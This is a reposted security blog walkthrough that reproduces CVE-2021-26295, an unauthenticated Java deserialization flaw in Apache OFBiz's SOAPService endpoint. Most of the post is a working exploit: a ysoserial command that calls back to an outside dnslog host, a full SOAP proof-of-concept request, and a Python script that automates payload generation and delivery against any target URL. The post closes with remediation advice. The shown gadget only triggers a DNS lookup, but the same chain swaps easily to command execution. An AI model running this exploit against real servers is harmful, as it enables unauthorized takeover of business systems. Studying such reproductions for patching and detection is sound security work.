CVE-2021-26295: Apache OFBiz Deserialization Vulnerability Reproduction

admin, 2024-02-07 23:52:52
Apache OFBiz is an open-source product for enterprise process automation. It provides framework components and business applications for ERP (enterprise resource planning), CRM (customer relationship management), e-commerce, SCM (supply chain management), MRP (manufacturing resource planning) and MMS/EAM (maintenance management system / enterprise asset management).
0x02 Vulnerability overview
Apache OFBiz has published a security update for an unauthenticated deserialization vulnerability (reported as RMI deserialization leading to pre-auth command execution). An attacker without any credentials can use it to take over the OFBiz instance. The reproduction below goes through the SOAP endpoint /webtools/control/SOAPService: the cus-obj element of the request body carries a hex-encoded Java serialized object, which the server decodes and deserializes, so a ysoserial gadget chain placed there is executed during deserialization.
0x03 Affected versions

Apache OFBiz < 17.12.06

0x04 Environment setup

The environment is built with Docker, which is the most convenient option:

docker run -d -p 811:8080 -p 8443:8443  opensourceknight/ofbiz

URL: https://your_ip:8443

If the page loads normally, the environment is ready.


0x05 Vulnerability reproduction

Tools and scripts used:

Java deserialization payload generator: ysoserial-0.0.6-SNAPSHOT-all.jar

str_hex.py (reads the serialized payload written by ysoserial and prints it as a hex string; .decode() is needed on Python 3 so the output is plain text rather than a bytes literal):

    #!/usr/bin/python
    # coding=utf8
    import binascii

    # payload.txt is the raw Java serialized object written by ysoserial
    with open('payload.txt', 'rb') as payload_handle:
        content = payload_handle.read()

    # cus-obj expects the object as a hex string
    str_hex = binascii.hexlify(content).decode()
    print(str_hex)

1. Generate a DNS-callback payload with ysoserial-0.0.6-SNAPSHOT-all.jar (the URLDNS gadget only triggers a DNS lookup, which is enough to confirm deserialization without running any command):


java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://nu2xus.dnslog.cn > payload.txt

2. Convert the payload to hex with the Python script:

python str_hex.py


3. Build the DNS-callback PoC request

PoC path: /webtools/control/SOAPService

The hex string from step 2 goes into the cus-obj element. The Content-Type must be text/xml, and Content-Length must match the actual body length.

POST /webtools/control/SOAPService HTTP/1.1
Host: 172.16.61.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 875

<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/">
<ying:cus-obj>[hex string produced in step 2]</ying:cus-obj>
</ying:clearAllEntityCaches>
</soapenv:Body>
</soapenv:Envelope>


Checking dnslog.cn shows that the DNS query from the target has been logged, which confirms the object was deserialized.


4. One-click test with Python

Place the ysoserial jar and OFBiz.py in the same directory. The script automates steps 1 to 3: it runs ysoserial, hex-encodes the output, wraps it in the SOAP envelope and posts it to the target. Note that a 200 response only means the request was accepted; the DNS log is still the real indicator of success.

    #!/usr/bin/python
    # coding=utf8
    import sys
    import os
    import ssl
    import binascii
    from optparse import OptionParser

    import requests
    from fake_useragent import UserAgent
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    # The lab instance serves a self-signed certificate on 8443, so skip TLS verification
    ssl._create_default_https_context = ssl._create_unverified_context
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


    def addoptions():
        hstr = 'python3 7961.py -u https://192.168.1.1:8443 -d http://dnslog.cn'
        opt = OptionParser(hstr)
        opt.add_option('-d', '--dnslog', type='string', action="store", dest='dnslog', help='dnslog')
        opt.add_option('-u', '--url', type='string', action="store", dest='url', help='target_url')
        (opts, args) = opt.parse_args()
        global dnslog
        global url
        dnslog = opts.dnslog
        url = opts.url
        if not opts.dnslog:
            sys.exit("must be given dnslog url, use -d")
        if not opts.url:
            sys.exit("must be given target url, use -u")


    def exploit(url, dnslog):
        payload_url = url + '/webtools/control/SOAPService'
        # Step 1: generate the URLDNS gadget chain with ysoserial
        os.system(f'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS {dnslog} > payload.txt')
        # Step 2: hex-encode the serialized object, as cus-obj expects it
        with open('payload.txt', 'rb') as payload_handle:
            content = payload_handle.read()
        payload = binascii.hexlify(content).decode()
        # Step 3: wrap it in the SOAP envelope; the server deserializes cus-obj
        data = f"""<?xml version='1.0' encoding='UTF-8'?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header/><soapenv:Body>
    <ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/">
    <ying:cus-obj>{payload}</ying:cus-obj>
    </ying:clearAllEntityCaches>
    </soapenv:Body>
    </soapenv:Envelope>"""
        headers["Content-Type"] = "text/xml"
        try:
            rep = requests.post(payload_url, data=data, verify=False, headers=headers)
            if rep.status_code == 200:
                print('[+] poc is completed')
            else:
                print('[-] poc failed')
            rep.close()
        except Exception:
            print('[-] http access failed')


    if __name__ == '__main__':
        ua = UserAgent()
        headers = {'User-Agent': ua.random}
        dnslog = ''
        url = ''
        addoptions()
        exploit(url, dnslog)

0x06 Remediation

Upgrade to the latest Apache OFBiz release (17.12.06 or later fixes this issue).

Download:

https://ofbiz.apache.org/download.html#vulnerabilities

Upstream fix commit:

https://github.com/apache/ofbiz-framework/commit/af9ed4e/

References:
https://nosec.org/home/detail/4705.html
https://www.o2oxy.cn/3271.html

Originally published on the WeChat public account 玄魂工作室: CVE-2021-26295: Apache OFBiz Deserialization Vulnerability Reproduction

Reposted by CN-SEC中文网 with the original author's credit: https://cn-sec.com/archives/784003.html
